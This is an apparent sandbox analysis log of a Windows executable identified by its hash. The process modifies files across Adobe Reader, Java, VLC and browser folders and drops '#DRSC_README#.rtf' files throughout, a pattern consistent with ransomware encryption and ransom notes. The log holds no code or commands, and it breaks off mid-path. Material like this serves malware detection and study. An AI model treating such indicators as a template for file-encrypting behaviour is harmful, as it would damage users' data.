C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\reflow.api 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\uk-ua\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\pl-pl\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\en-il\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\th_get.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\ka\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ro-ro\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jvm_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\release 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\uk\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ks_IN\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\hu-hu\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ro-ro\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\de-de\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-modules-appui.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_sendforsignature_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\desktop.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\sl-si\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\eu-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\en-ae\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\themes\dark\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\bin\ij.bat 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-openide-nodes.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\ext\access-bridge-64.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\gu\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_nextarrow_default.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_es_135x40.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\oracle.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\ms_get.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\es-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\hu-hu\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\ca-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\nl-nl\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\tr-tr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\en-ae\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_en_135x40.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\fi-fi\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\oc\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\jre\lib\ext\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.bidi_0.10.0.v20130327-1442.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.scheduler.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\e4-dark_preferencestyle.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-openide-dialogs.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-selector-ui.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\sv-se\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\mailapi.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\en-il\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\content-types.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\jre\lib\jfr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-spi-actions_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\pt_PT\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_filterselected-hover_32.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_move_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\zh-cn\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Click on 'Change' to select default PDF handler.pdf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\fr-ma\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\ms.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\bg_get.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\tzmappings 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\hi\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\lua\http\images\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_filterselected-dark-disabled_32.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\sv-se\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\jstatd.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.workbench_3.106.1.v20140827-1737.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\nb-no\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\root\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\plugin.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\amd64\jvm.cfg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\WelcomeCardRdr.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\nl-nl\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\new_icons.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\security\javaws.policy 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\acrobat_pdf.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\de-de\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\hr-hr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\en-il\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\root\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jre1.8.0_66\lib\deploy\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\it-it\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\en-ae\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\hr-hr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\de-de\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\CompleteCheckmark2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\org-netbeans-lib-profiler-charts.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\lg\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\it-it\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\da-dk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\nb-no\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-keyring-impl.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jmx_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\RegisterUse.ADTS 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_editpdf_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\share.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\sk-sk\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ru-ru\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.osgi.compatibility.state.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\images\themes\dark\example_icons.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\messages.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\sk\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_checkbox_selected_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\pt-br\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\jinfo.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-loaders_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\be\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\sq\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\it-it\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\sv-se\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\sv-se\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ecf.provider.filetransfer.ssl_1.0.0.v20140827-1444.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.eclipse_2.1.200.v20140512-1650.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Mozilla Firefox\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32Info.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_selectlist_checkmark_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\plugin.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\scan-2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\ru-ru\PlayStore_icon.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\splash.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\fr-ma\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\css\main.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\ca-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\nl-nl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\etc\visualvm.clusters 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-api-progress_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app-api\dev\app-api.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\fi-fi\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pdf-ownership-rdr-de_de.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\lib\derbyLocale_cs.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.natives_1.1.100.v20140523-0116.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.rcp.product_5.5.0.165303\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_opencarat_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader 